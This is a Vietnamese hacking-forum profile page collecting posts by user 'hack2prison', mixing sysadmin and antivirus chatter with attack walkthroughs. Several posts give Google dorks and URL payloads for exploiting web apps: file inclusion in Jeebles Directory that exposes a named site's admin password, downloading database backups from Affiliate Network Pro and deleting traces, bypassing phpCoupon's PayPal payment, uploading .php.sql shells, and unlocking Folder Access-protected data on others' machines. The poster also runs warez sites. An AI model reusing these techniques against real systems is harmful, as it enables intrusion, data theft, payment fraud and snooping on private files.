Messages posted by "hack2prison"

Hỏi về cách upload file trên CentOS minimal

hack2prison — GMT

ComandC wrote:

Hiện tại mình có dùng 1 máy ảo là centOS nhưng ở bản Minimal. Cho mình hỏi làm sao mà upload file lên server này được ạ?

bật dịch vụ sshd chạy cái này: Bitvise SSH Client http://www.bitvise.com/download-area

Tạo một sever hosting đa năng

hack2prison — GMT

thanh_1313 wrote:

Cho mình hỏi có cách nào tạo một hosting Linux (ubuntu hay centos...) có thể chạy được tất tần tật các source web php, asp... Mình có cài qua zpanel, cpanel, kloxo, ... nhưng chúng không có chạy được mấy loại web hay chạy trên windows. Mình đang muốn tiết kiệm chi phí, bỏ hết tất cả lên 1 con linux thui. Các bác có gợi ý nào cho mình không? :(

Được nhé bạn: http://www.mono-project.com/Main_Page

Nhờ vả: Tính toán resource cho VPS

hack2prison — GMT

Ikut3 wrote:

Trước khi sizing 1 cái gì từ thiết bị phần cứng, cho đến các tunning chỉnh sửa thì những thông tin như thế này bắt buộc phải có - Tổng lượng User connect / tính trung bình - Lượng Concurrent Request thật đến dịch vụ tại mọi thời điểm - Số lượng User mà bạn nhắm sẽ đáp ứng cho thời điểm hiện tại và tương lai Trong các thông số mà bạn đưa ở trên kia thì không có cái thông tin gì về lượng người bạn sẽ đáp ứng với cấu hình phần cứng hiện tại cả. Theo mình, trước khi tunning hay quyết định gia tăng tài nguyên hệ thống nhằm mở rộng tính scalability 1 dịch vụ / 1 ứng dụng phục vụ người dùng. Mình phải thấy được rõ những thông số thật mà hệ thống hiện tại đang phải chịu tải, kiểm tra từ các thành phần Application - Operating System - Network - Hardware xem có bị bottleneck ở đâu không rồi mới bắt đầu tiến hành nâng cấp. Tất nhiên để làm được cái đoạn in nghiêng trên thì chỉ có 1 cách giúp bạn đó là theo dõi. Những công cụ monitor như Dtracetool , Sysstat (có sẵn) v.v... đều có thể làm rất tốt việc này.

Thanks Tổng số visitors tại cùng thời điểm trung bình khoảng 150 người, mỗi visitor mở khoảng 5 tab đồng thời (theo thống kê của google analytics). Số lượng visitors ổn đình, ít tăng giảm đột biến. Mình chỉ tính cho hiện tại, còn sau này nếu có tăng thì nâng cấp sau.

Nhờ vả: Tính toán resource cho VPS

hack2prison — GMT

Chào các bạn Mình có 2 Severs: Server 1: Cài Apache + PHP dùng để chứa web code CPU: 2 Cores x Intel(R) Xeon(R) CPU E5640@2.67GHz RAM: 2 GB - DDR3 ECC RAM Server 2: Cài MySQL để chứa database CPU: CPU XEON E5/E3 / Opteron 6200/6300 (dual core) RAM: 2 GB Sở dĩ mình tách ra 2 Servers vì sites của mình là warez sites, dễ bị suspended. Nếu bị report và suspend thì chỉ server chứa code bị suspend, server database vẫn OK. Server 1 và Server 2 khác network nhưng gần nhau về địa lý (cùng 1 quốc gia) Mình nhờ các bạn tính toán giùm mình tài nguyên phần cứng để đảm bảo site hoạt động tốt đồng thời không lãng phí tiền bạc cho tài nguyên phần cứng. Đây là task của Server 1 (chứa web code): free -m Code:

total       used       free     shared    buffers     cached
Mem:			2001        247       1754          0         29         84
-/+ buffers/cache:        133       1867
Swap:          666          0        666

top

Đây là task của Server 2 (chứa MySQL database) free -m Code:

total       used       free     shared    buffers     cached
Mem:			2010       1399        610          0         10       1248
-/+ buffers/cache:        141       1869
Swap:         2099          0       2099

top

Nhờ các bạn tư vấn tăng/giảm RAM và CPU của mỗi Server: ISP họ bán RAM theo block là 512 MB, CPU theo block là core. Cảm ơn

PHCDownload 1.1.0 by H2P

hack2prison — GMT

Mô tả: - Script: PHCDownload là mã nguồn ứng dụng web dùng để quản lý upload/download rất hay nhưng điểm yếu muôn thuở của các code cho phép upload là tạo điều kiện cho attacker cài ám khí lên server. - Vendor: http://phpcredo.com - Menthod: Remote File Inclusion. - Infect: search, addfile và add comment function. - Version: v1.1.0 and older - Reported: H2P Khai thác: - Google dork: Powered by PHCDownload 1.1.0 - http://[insecure_site]/[path]/search.php Search Words: ">< Submit và xem điều kỳ diệu. Note: Tương tự đối với chức năng add file và post comment Bạn có thể chạy mã PHP: http://[insecure_site]/[path]/search.php?string=">< Cái này hơi lạ, giống Remote File Inclusion nhưng còn có thể chèn và chạy trực tiếp mã PHP.

Re: Bị nhiễm virus j không biết?

hack2prison — GMT

Với người kinh nghiệm thì việc đó hơn giản nhưng với người chưa có kinh nghiệm tợ khuyên cậu cách tốt nhất để giải quyết. Làm đúng theo các bước sau: 1. Rút USB ra nếu đang cắm. 2. Dùng Hiren boot và Ghost lại máy. 3. Khởi động Windows. Tuyệt đối không chạy bất cứ chương trình nào đặc biệt là mở các ổ đĩa (cái này rất quan trọng, nếu không virus sẽ lây trở lại). 4. Download cài này: http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html Lưu file ngoài desktop nhé. Cài đặt nó. 5. Bật chương trình. Scan targets chọn tất cả. Nhấn nút Scan. 6. Nhấn vào FixSystem, chọn các mục thích hợp hoặc chọn hết (Check all), nhấn Apply. Xong rồi đó. Tuy nhiên chương trình diệt virus này không hiệu quả, nó chỉ dùng như một Tool nhỏ. Bạn nên cài một chương trình antivirus khác (tớ thích Avast, nhẹ mà hiệu quả )để quét lại hệ thống, chắc là sẽ lượm được vài em. Thân

BKAV đích thực là mã độc?

hack2prison — GMT

Mình không dùng BKAV nhưng đọc cái này ở trang nào đó thấy có lý, leech qua đây để anh em bàn luận.

Tôi mới download BKAV bản mới nhất (16-1-2009) Và nhờ http://www.virustotal.com check thử. Nói thêm tí: virustotal.com sử dụng 38 phần mềm diệt virus hàng đầu thế giới BKAV không nằm trong 38 mới đauscau: http://www.virustotal.com/sobre.html Điên thế nhỉ, một phần mềm diệt virus hay thế mà không sử dụng Kết quả: http://www.virustotal.com/analisis/5778ad760a1472ed1be610e299f845a9 a-squared 4.0.0.73 2009.01.16 PHISH.FraudTool.BachKhoa.A!IK eSafe 7.0.17.0 2009.01.15 Suspicious File Ikarus T3.1.1.45.0 2009.01.16 PHISH.FraudTool.BachKhoa.A McAfee 5496 2009.01.15 New malware.jm McAfee+Artemis 5496 2009.01.15 New malware.jm SecureWeb-Gateway 6.7.6 2009.01.16 Win32.Malware.gen!84 (suspicious) Sunbelt 3.2.1835.2 2009.01.16 VIPRE.Suspicious Có thể là do nhận diện nhầm, nhưng chả hiểu sao càng coi cái kết quả test này lại càng thấy đúng. FraudTool : Cái này chính xác!. Bán giá đắt, cam kết nhiều nhưng chẳng đáp ứng được bao nhiêu mà kiện nó cũng không được -->Fraud Malware , Suspicious File : Cũng thấy đúng, thu thập thông tin của người sử dụng, nếu không sao anh ấy biết có bao nhiêu người đang sử dụng anh ấy. Ikarus, a-squared chỉ đích danh PHISH.FraudTool.BachKhoa.A và tớ tin vào kết luận đó. Chắc 2 anh này đã mổ xẻ rất kỹ nên chỉ đích danh như vậy. Sắp tới chắc anh Q sẽ liệt tất cả 38 chương trình diệt virus trên vào danh sách phần mềm diệt WINDOWS ) Còn ý kiến của bạn thế nào?

Re: Máy tính của tôi dính virus autorun.inf khủng khiếp.

hack2prison — GMT

tuangiang08 wrote:

Tôi có dùng Bkav và thấy Bkav có tool rất hay bạn có thể down ở đây: http://bkav.com.vn/home/download/bkavhometool.exe bạn lưu trên máy tính của bạn sau đó chạy file này lên bấm vào Ghi log... sau đó chọn đường dẫn lưu lại trên máy tính của bạn file có tên là Kiemtra2009.bkc, bạn hãy gửi file này về cho tôi qua email tuangiang08@gmail.com tôi sẽ kiểm tra và xử lý cho bạn. Chúc bạn thành công. :)

Này thì BKAV: http://www.virustotal.com/analisis/5778ad760a1472ed1be610e299f845a9

Re: File Autorun.inf và các vấn đề liên quan và cách phòng chống virus

hack2prison — GMT

Chương trình này đặc trị virus lây qua USB. Với nó, hãy quên virus lây qua USB đi nhé: http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html

Re: Virus lây qua usb.

hack2prison — GMT

Chương trình này đặc trị virus lây qua USB. Với nó, hãy quên virus lây qua USB đi nhé: http://warezshare.com/anti-virusspy/516-usb-drive-antivirus.html

Re: trang FBI.gov.vn có lỗi rất thú vị !!!

hack2prison — GMT

Post nhầm chỗ rồi, sorry

Re: foderl lock

hack2prison — GMT

Folder Lock cũng có điểm yếu của nó, có thể bị soi mói đấy. Nếu bạn muốn giấu thì zip đặt mật khẩu ngon ngon chút hoặc lại renname thành đuôi khác. VD: secret.sys rồi copy vào một thư mục nào đó "sâu sâu" chút như: C:\WINDOWS\Help\Tours\htmlTour Khi cần dùng thì rename lại thành secret.zip để sử dụng. Dùng xong update thông tin rồi lại cất giấu như cũ. Chú ý: Lưu một bản copy vào hòm thư để lỡ quên format C:\ hay quên pass file zip thì có hàng chống cháy

Re: Qua mặt Folder Access

hack2prison — GMT

Hì hì Nhưng câu ở trên là không tìm thấy File đó thì lấy đâu ra để mà mở nó bằng Notepad hả anh Zai

You cài folder access 2 chưa à? Cài xong và lock một folder thì mới có file đó :D

Jeebles Directory: LFI Get Admin trong nháy mắt

hack2prison — GMT

Mình tìm script làm trang download và phát hiện ra lỗi Local File Inclusion của Jeebles Directory. vào http://google.com gõ từ khóa: Powered by Jeebles Directory Kết quả cũng kha khá nhỉ :D ta lấy thằng thứ 2 thử nhé: http://www.esco.net/highres Công thức khai thác: http://[site]/[path]/download.php?settings2.inc.php Như vậy với ví dụ trên sẽ là: http://www.esco.net/highres/download.php?settings2.inc.php Một file đẹp đẹp mời ta download. Mở ra thấy: Code:

...
$LOGIN_INFORMATION = array(
  'admin' => '3quipm3nt01'
...

Bạn có thể download các file khác, muốn rõ thông tin download script này về nghiên cứu he COMPLETED - Discovered by H2P

Re: Qua mặt Folder Access

hack2prison — GMT

Không phải chạy Start-->Run đâu. Dùng Notepad mở file đó. Test bản mới nhất trên site của nó

Re: Làm ơn chỉ dùm cách diệt virus trong win

hack2prison — GMT

BKAV à? :mrgreen: hài lắm CHo USB vào nó quét một thôi một hồi, thậm chí đã rút USB ra rồi nó vẫn miệt mài quét. Có trường hợp quét xong báo: Đã phát hiện Virus ABC F:\ABC.com mặc dù cái máy tính đó "không có chữ F nào cả". :mrgreen: Nhớ ngày trước lúc dịch virus lây qua Yahoo, mình có lấy mã nguồn về biên dịch thử. Nếu thay đổi http://nhut.be bằng bất kỳ domain nào khác và quét file đó thì BKAV không cảnh báo virus gì cả ===>BKAV không "phát hiện" virus theo hành vi mà "phát hiện" theo chuỗi ký tự như một cái máy không hơn.

Re: trời bảo mật quá hóa hại mong các anh giúp đỡ

hack2prison — GMT

Đã giải quyết xong. Hình như đây cũng là một vấn đề bảo mật của chương trình. Có thể coi là một bug: Xem: /hvaonline/posts/list/0/15337.html

Qua mặt Folder Access

hack2prison — GMT

Cậu bạn nào đó đã post bài cầu cứu lấy lại dữ liệu của cậu ta bảo vệ bằng Folder Access nhưng lỡ quên password /hvaonline/posts/list/7134.html, tôi nghĩ nhiều người cũng bị tình trạng này nên mở topic mới để sau dễ sử dụng. Dĩ nhiên bạn cũng có thể dùng để đánh cắp dữ liệu, nhưng hậu quả xin đừng đổ cho tôi :mrgreen: . Nếu thấy "hay" thì mod PIN lên cái nhé. Tớ đã test thành công với bản FREE: Muốn bắt cọp phải vào hang cọp, download về cái đã http://www.folderaccess.com Cài đặt nó để thử nghiệm. Tạo một folder ‘test’ trong D và copy một file text bất kỳ vào đó để thử nghiệm nhé (Vì sao phải copy một file vào đó? vì nếu folder empty sau này làm sao bạn kiểm tra được sự toàn vẹn thông tin). Ngay khi lock folder ‘test’, bạn có thể copy/delete/rename nó. Khởi động lại và thử double click vào nó, chuyện gì xảy ra? Right click chọn Open hay Explorer bạn sẽ được chuyển vào Control Panel. Thử double click vào xem, nó đòi password. Giả sử rằng ta ngồi nhờ máy và bị chủ nhân nó lock folder ‘test’ trước đó hoặc ta là chủ nhân nhưng quên mìa nó password. Bây giờ ta thử copy/delete/rename thử coi, nó sẽ báo lỗi: Code:

Cannot delete test.{21EC2020-3AEA-1069-A2DD-08002B30309D}: It is being used by another person or program.
Close any program that might be using the file and try again.

Mở nó ra thì nó đòi password. Không lẽ bó tay? Có rất nhiều bạn đưa ra phương án khác nhau nhưng phần ý kiến là copy sang máy khác, kill process (hình như không được), nhưng như đã nói ở trên, làm sao copy được trong windows đây? hay là copy trong DOS? Tôi đã đọc tất cả các ý kiến được thảo luận trong topic của bạn đó nhưng có vẻ không thể thực hiện (tôi chưa thử). Cách 1. Vào NC DOS bằng Hiren Boot chẳng nhìn thấy folder 'test' đâu cả. Chỉ thấy file ‘test~1. {21’. Khè khè trong windows nhìn thấy thư mục ‘test’ chuyển thành biểu tượng của chương trình Folder Access nhưng thực chất nó là một file, nhớ lại khi delete/copy/rename nó báo cannot delete/copy/rename test.{21EC2020-3AEA-1069-A2DD-08002B30309D} vào DOS nó tự đổi tên theo quy tắc 8.3. Rename nó thành ‘test’ và khởi động lại Windows nào. Kiểm tra lại sự toàn vẹn thông tin mà tôi nói ở trên nhé. :mrgreen: Nếu bạn không có Hiren Boot hoặc không biết sử dụng thì dùng cách 2. Cách 2. Copy ngay trong windows với một thủ thuật nhỏ. Mở file C:\WINDOWS\system32\mslck.dat thấy nội dung: 'Test D:\ 1' bạn sửa số 1 thành 0. Save và khởi động lại. Bây giờ bạn thử copy vào USB nào. Ngạc nhiên chưa? Tuy nhiên folder gốc và folder vừa copy vào USB vẫn chưa thể mở được. Nó vẫn đòi pass một cách đáng ghét. Đưa sang máy khác, vẫn chưa đọc được đâu. Bạn phải cài Folder Access vào. Đừng vội set password cho chương trình nhé. Click thử vào folder 'test' vừa copy trong USB coi. Nó đã được unlock. Với bản Purchase cũng tương tự, bạn có thể dùng serial lúc cài đặt chương trình như là một password "chống cháy". Tớ nghĩ có thể dùng ngay Windows Comander để rename file đó nhưng chưa test. Bản chất vấn đề đã được giải quyết, xin vui lòng test thử các cách khác có khi đơn giản hơn. H2P

Re: trời bảo mật quá hóa hại mong các anh giúp đỡ

hack2prison — GMT

+ default password (hack2prison): lQ nghĩ là nếu ctr FA2 này đơn giản (ở chỗ nó có thể vô hiệu hoá dễ dàng) thì nó sẽ ko có default pasword. Nhưng đây cũng là 1 cách có thể áp dụng được với các ctr khác.

Default password chính là cái serial number lúc bạn cài. Xem file serial trong thư mục cài đặt nhé. Tớ đã thực hiện thành công với vài chương trình lock folder. Không biết chương trình bạn dùng có áp dụng cách này được không

Re: trời bảo mật quá hóa hại mong các anh giúp đỡ

hack2prison — GMT

lQ wrote:

H3in3k3n wrote:

Format hết rồi dùng Soft khôi phục dữ liệu chứ sao .Hixx đúng là bảo mật quá hóa hại .
Mẹ ôi, mới nghe cách này lần đầu luôn. :-o)

Không rõ chỗ này, nhưng với GetDataBack có thể làm được việc này đó bạn. Mình format 2 lần vẫn lấy lại được trừ các file dung lượng lớn (phim và file .GHO)

Re: trời bảo mật quá hóa hại mong các anh giúp đỡ

hack2prison — GMT

Các chương trình bảo vệ folder thường có một default password để khi lỡ quên pass có thể giải nguy. Tôi đã dùng mấy chương trình và thấy chúng hoạt động như vậy. Default password chính là số serial khi bạn cài đặt (Mở thư mục file setup coi thử file serial.txt). Try it. Nhớ lúc trước thằng ku bạn nó bảo vệ thư mục phim sex nó đóng với con bồ nó, mình vào xem bằng cách này phê :D

Re: BigDump File Upload Exploit

hack2prison — GMT

Cái này không phải là bug mà là sơ xuất của admin, lẽ ra phải delete thì lại không delete. Security bug là một lỗi có thể nguy hiểm đến ứng dụng/hệ thống mà khi thiết kế coder không lường trước được Với cái bigdump thì ý đồ của coder này là dùng để upload file lên server và restore nó và nó thực hiện đúng ý đồ này, không phát sinh sự nguy hiểm nào. Lỗi là do sự sơ xuất hoặc thiếu hiểu biết của người sử dụng. Việc chạy được file .php.sql là do lỗi server không liên quan gì đến bigdump. :)

phpCoupon Lỗi củ chuối

hack2prison — GMT

Nguồn: http://www.securityfocus.com/archive/1/474936 1. Click "Business Owners" và đăng ký một account. 2. Login sẽ thấy: ------------------------------------------------- Membership Expiration: 00-00-0000 Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0 ------------------------------------------------- Nghĩa là bạn chưa phải là thành viên đóng phí (Premium Member). 3. Click "Billing Control Panel" Click "Buy now" sẽ wwwect tới paypal.com checkout OK, copy link http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgradeX và paste đè lên link paypal. Chú ý: =upgradeX ---> X là số promotion bạn cần. Example: http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgrade5 OK Login lại bạn sẽ thấy: ------------------------------------------------- Membership Expiration: 07-28-2007 Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0 Lặp lại động tác trên lần nữa Expiration sẽ tăng thêm 1 tháng, làm cái nữa sẽ tăng lên 2 tháng... Khè khè, dùng không mất tiền.

Re: Affiliate Network Pro, mới tinh

hack2prison — GMT

Bổ sung: - Added by leo9x: http://[site]/[path]/admin/backupstart.php Upload len shell file dạng .php.sql sẽ run được trên nhiều server: http://[site]/[path]/admin/dump/file.php.sql - Added by navaro: http://[site]/[path]/admin/downloadbackup.php?fl=[filename] -->Local File Inclusion

Affiliate Network Pro, mới tinh

hack2prison — GMT

Nguồn: http://www.securityfocus.com/archive/1/481206 Lâu rồi, chăm sóc vợ sắp đẻ nên H2P không tham gia forum. Hôm nay ngồi ngứa nghề tìm ra cái bug stupid nhưng khá nguy hiểm. Cũng chẳng có gì cao siêu nên H2P mới gọi là stupid bug, nhưng vấn đề là khai thác toàn diện. Lòng vòng nhiều quá, ta vào cuộc: google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy. Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants 1. http://www.eduaffiliates.com/admin/dump sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy. Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao. 2. Tạo file backup - http://www.eduaffiliates.com/admin/backupstart.php click vào nút Backup a. Quay lại: http://www.eduaffiliates.com/admin/dump sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it. b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql thay ngày tháng năm theo giờ sever nhé. c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql 3. Xóa dấu vết Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql Ghi chú: Trang eduaffiliates.com đã die, tìm trang khác để thực hành. Một vài trang đã fix, Còn khá nhiều trang dính đấy. COMPLETED - H2P

Re: Cẩn thận "virus" Yahoo mới: VnGuide

hack2prison — GMT

Uh, giá trị bằng 0 thì đâu có tác dụng gì, 3 dòng thừa. Chú này biên dịch lại mà chẳng hiểu tác dụng của nó là gì Script Kid Dies :mrgreen:

Re: Sử dụng HideIP và Proxy như thế nào?

hack2prison — GMT

Tranh thủ quảng cáo cái: http://sockstoday.com sock ngon nhà em đấy :lol:)

Re: Hỏi về chuẩn đánh giá tính security cho các sản phẩm phần mềm?

hack2prison — GMT

1. Nếu cái gì đó có một "CHUẨN" nghĩa là gần như mang tính tuyệt đối <> Trên đời này chẳng có gì là tuyệt đối. 2. Có thể tồn tại một chuẩn mà bạn đang tìm nhưng đọc lại 1

Re: how to access a locked folder?

hack2prison — GMT

Khởi động từ DOS copy qua chỗ khác mà coi :)

Re: 0DAY RFI in phpBB = 2.0.22

hack2prison — GMT

Nghe có vẻ tìm bug mới dễ nhỉ. Khâm phục :))